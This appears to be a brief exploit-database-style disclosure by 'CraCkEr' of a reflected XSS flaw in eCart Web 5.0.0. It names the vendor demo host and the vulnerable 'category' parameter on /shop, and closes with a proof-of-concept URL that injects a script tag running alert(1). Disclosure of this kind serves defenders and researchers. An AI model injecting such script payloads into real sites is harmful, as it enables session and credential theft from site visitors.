++—————————————————————————————+
|| C r a C k E r ++
++ T H E C R A C K O F E T E R N A L M I G H T ||
+—————————————————————————————++
+—- Unimaginable Crack …. —-+
++—————————————————————————————+
++ [ Exploits ] ++
+—————————————————————————————++
CraCkEr is the Author
| Website : ecartmultivendorweb.thewrteam.in |
| Vendor : By WRTEAM Ekart.Com |
| Software : eCart Web 5.0.0 – Multi Vendor eCommerce Marketplace |
Vuln Type: Reflected XSS
| Method : GET |
Impact : Manipulate the content of the site
| |
|—————————————————————————————-|
| ++
+—————————————————————————————++
: :
Release Notes:
| ————- |
The attacker can send to victim a link containing a malicious URL in an email or
instant message can perform a wide variety of actions, such as stealing the victim’s
session token or login credentials
| |
++—————————————————————————————+
++ ++
+—————————————————————————————++
Greets:
Raz0r and The_PitBull.
CryptoJob (Twitter) twitter.com/CryptozJob
++—————————————————————————————+
CraCkEr 2023 (c) ++
+—————————————————————————————++
URL parameter “category” is susceptible to XSS
Path: /shop
https://ecartmultivendorweb.thewrteam.in/shop?category=baby-need-s-1su7mh%3cscript%3ealert(1)%3c%2fscript%3eg9eop&sub-category=test-1
[-] Done